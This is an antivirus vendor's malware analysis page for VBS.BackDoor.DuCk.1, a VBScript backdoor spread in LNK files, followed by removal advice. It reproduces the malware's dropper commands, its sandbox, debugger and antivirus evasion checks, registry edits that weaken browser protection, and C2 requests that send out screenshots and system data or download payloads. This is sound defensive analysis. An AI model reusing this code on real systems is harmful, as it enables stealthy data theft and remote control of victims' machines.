Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

VBS.BackDoor.DuCk.1

Added to the Dr.Web virus database: 2015-04-03

Virus description added:

A backdoor that can execute cybercriminals’ commands and send the remote server screenshots made on the infected computer. It is written in the Visual Basic Script programming language and is distributed as an LNK icon file with an embedded VBS script, which is archived. Once the icon is clicked, the feature findstr starts to run. It is used to identify the signature of the script’s beginning and to extract this script to a separate file. In other words, the following actions are executed:

copy *.doc.lnk %tmp%
%systemdrive%
cd %tmp%
dir /b /s *.doc.lnk > o
echo set /p f=^.bat
echo type "%f%"^>z9>>.bat
echo findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del *.lnk /S /Q /Y >>.bat
.bat

To identify the address of the command and control server, the following algorithm is used. At the beginning of the script there are three links:

YouTubeLinks(0) = "https://dl.dropboxusercontent.com/s/v**********smun/index.html"
YouTubeLinks(1) = "http://www.youtube.com/watch?v=*******0b"
YouTubeLinks(2) = "https://www.youtube.com/watch?v=*******D0b"

screen

The Trojan sends to the above mentioned resources a GET request, and within the received reply it executes a search based on the following regular expression:

our (.*)th psy anniversary

As a result, the server sends a reply with a number. This number is divided by 31,337—this mathematical operation results in another number that, after being converted to a hexadecimal notation, represents the IP address of the command and control server with the added « /wp-admin-content/» string. To verify whether the server works or not, the Trojan sends a GET request "ХХХ.ХХХ.ХХХ.ХХХ/wp-admin-content/Status2.php" to the specified address and checks the reply for the string "ОКОКОК".

To be able to check the infected computer for virtual environment, the Trojan incorporates a special verification mechanism. The check procedure consists of three steps:

Function isVmDrivers()
        Dim Drivers(2)
        Drivers(0) = "virtualbox"
        Drivers(1) = "parallels"
        Drivers(2) = "vmware"
 
        strText = shell_exec("driverquery")
        result = False
        For Each Driver in Drivers
                inString = inStr(strText, Driver)
                If not inString = 0 Then
                        result = Driver
                End If
        Next
        isVmDrivers = result
End Function
Function isVmProduct()
        Dim Product
        Dim badProducts(1)
        badProducts(0) = "parallels virtual platform"
        badProducts(1) = "virtualbox"
        Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}
           !\\.\root\cimv2")
        Set colItems = objWMIService.ExecQuery("Select * from Win32_BaseBoard")
        For Each objItem in colItems
                Product = LCase(objItem.Product)
        Next
        result = False
        For Each badProduct in badProducts
                inString = inStr(Product, badProduct)
                If not inString = 0 Then
                        result = badProduct
                End If
        Next
        isVmProduct = result
End Function
Function isVmMAC()
        Dim macs(29)
        macs(0) = "00-01-5D"
        macs(1) = "00-03-BA"
        macs(2) = "00-07-82"
        macs(3) = "00-0F-4B"
        macs(4) = "00-10-4F"
        macs(5) = "00-10-E0"
        macs(6) = "00-14-4F"
        macs(7) = "00-20-F2"
        macs(8) = "00-21-28"
        macs(9) = "00-21-F6"
        macs(10) = "00-50-56"
        macs(11) = "00-0C-29"
        macs(12) = "00-05-69"
        macs(13) = "00-03-FF"
        macs(14) = "00-1C-42"
        macs(15) = "00-16-3E"
        macs(16) = "08-00-27"
        macs(17) = "00-1C-14"
        macs(18) = "08-00-20"
        macs(19) = "00-0D-3A"
        macs(20) = "00-12-5A"
        macs(21) = "00-15-5D"
        macs(22) = "00-17-FA"
        macs(23) = "00-1D-D8"
        macs(24) = "00-22-48"
        macs(25) = "00-25-AE"
        macs(26) = "00-50-C2"
        macs(27) = "00-50-F2"
        macs(28) = "44-45-53"
        macs(29) = "7C-ED-8D"
        strText = shell_exec("ipconfig /all")
        result = False
        For Each mac in macs
                inString = inStr( strText, LCase(mac) )
                If not inString = 0 Then
                        result = mac
                End If
        Next
        isVmMAC = result
End Function

Moreover, to monitor the operation system, a check for the running processes of various applications is being executed:

Function checkRunningProcess()
        Dim Processes(15)
        Processes(0) = "taskmgr.exe"
        Processes(1) = "procmon.exe"
        Processes(2) = "procmon64.exe"
        Processes(3) = "procexp.exe"
        Processes(4) = "procexp64.exe"
        Processes(5) = "ollydbg.exe"
        Processes(6) = "wpe pro.exe"
        Processes(7) = "wireshark.exe"
        Processes(8) = "immunitydebugger.exe"
        Processes(9) = "windbg.exe"
        Processes(10) = "tcpview.exe"
        Processes(11) = "tcpvcon.exe"
        Processes(12) = "gmer.exe"
        Processes(13) = "osam.exe"
        Processes(14) = "startup.exe"
        Processes(15) = "listdlls.exe"
        strText = shell_exec("tasklist")
        result = False
        For Each Process in Processes
                inString = inStr(strText, LCase(Process))
                If not inString = 0 Then
                        result = Process
                End If
        Next
        checkRunningProcess = result
End Function

Among other things, the backdoor checks the infected computer for anti-virus programs:

malBytesPath1 = s.ExpandEnvironmentStrings("%systemdrive%") & 
"\Program Files\MalwareBytes' Anti-Malware"
malBytesPath2 = s.ExpandEnvironmentStrings("%systemdrive%") & 
"\Program Files (x86)\MalwareBytes' Anti-Malware"
malBytesPath3 = s.ExpandEnvironmentStrings("%systemdrive%") & 
"\Program Files\Malwarebytes Anti-Malware"
malBytesPath4 = s.ExpandEnvironmentStrings("%systemdrive%") & 
"\Program Files (x86)\Malwarebytes Anti-Malware"
 
If fileSys.FolderExists(malBytesPath1) or fileSys.FolderExists(malBytesPath2) 
or fileSys.FolderExists(malBytesPath3) or fileSys.FolderExists(malBytesPath4) Then
        isMalwB = True
Else
        isMalwB = False
End If
If fileSys.FileExists("1.vbe") Then
        fileSys.CopyFile Wscript.ScriptFullName, path & "\.vbe"
        fileSys.DeleteFile "1.vbe"
        isKaspersky = inStr(LCase(installedAV), "kasper")
        If isKaspersky = 0 Then
                objShell.ShellExecute "cscript.exe", ".vbe", path, "open", 0
        End If
        WScript.Quit 1
End If

In the directory of the current Windows user, the Trojan creates the subfolder "%userprofile%\SystemFolder" and uses it as a work folder. To conceal its presence, the Trojan saves the document vtoroy_doc.doc in the folder %temp% and shows it to the user:

screen

It can be assumed that initially the cybercriminals had planned to use a PowerPoint presentation as a “decoy” because at the end of the Trojan’s code the PowerPoint termination algorithm is incorporated (if the corresponding box is checked). However, due to some reason, they decided to go with another plan.

To make screenshots, the backdoor utilizes its own library. The screenshots are saved in the temporary folder as files "%temp%\~PF214C.tmp".

Using a REG file, the Trojan disables the Microsoft Internet Explorer add-ins:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions"="no"

If it is running on a computer with the Windows Vista operating system, then with the help of another REG file it disables protected mode in Microsoft Internet Explorer:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"NoProtectedModeBanner"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2500"=dword:00000003

By creating the icon "%Startup%\Microsoft Sync Services.lnk", which launches the script h.vbe, the Trojan enables its own automatic startup.

screen

If the infected computer has a virtual environment running on it or some processes that are specified on the checklist are being executed, the Trojan sends a report with the relevant information to the command and control server:

server & "/rit.php?cn=" & computerName & "&un=" & userName & "&an=" & notifyName & 
"&id=" & Serial & "&r=" & reason

where “reason” stands for the string that was generated as the result of the executed checks:

reason = vmProd & ", " & vmDrivers & ", " & vmMac & ", " & runningProc

Future requests are sent once a minute. In order to receive commands, the Trojan sends to the server the following request:

server & "/c.php" & "?id=" & Serial

As a reply, the command "download>(.*)>(.*)" to download another malicious application to the infected computer is received:

Function downFile(args)
        argsNum = uBound(args) + 1
        writePath = args(1)
        wrapper = "Byt34rr4y"
        If argsNum = 2 Then
                data = getPage(server & "/d.php?f=" & Base64EncodeString( args(0) ), 60, "get")
                find = preg_match(wrapper & "(.*)" & wrapper, data)
                If IsArray(find) Then
                        writer = writeByteArrayToFile(writePath, find(0))
                End If
        End If
End Function

All other commands VBS.BackDoor.DuCk.1 sends to the CMD (command interpreter) or to PowerShell. To upload the previously made screenshots to the cybercriminals’ server, the following request is used:

server & "/rs.php", 30, "i=" & Serial & "&d=" & encodeBase64(inByteArray) & "&t=" & 
get_formatted_time() & "&l=" & Len(encodeBase64(inByteArray))

where “inByteArray” stands for the screenshot file data.

Moreover, on the infected computer this backdoor can execute a Python script. After being encrypted, the working results of this script are transferred to the cybercriminals’ server.

server & "/rk.php", 30, "i=" & Serial & "&d=" & encodedData & "&t=" & get_formatted_time() & 
"&l=" & Len(encodedData)

where “encodedData” stands for the encrypted with the base64 algorithm contents of the output file.

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android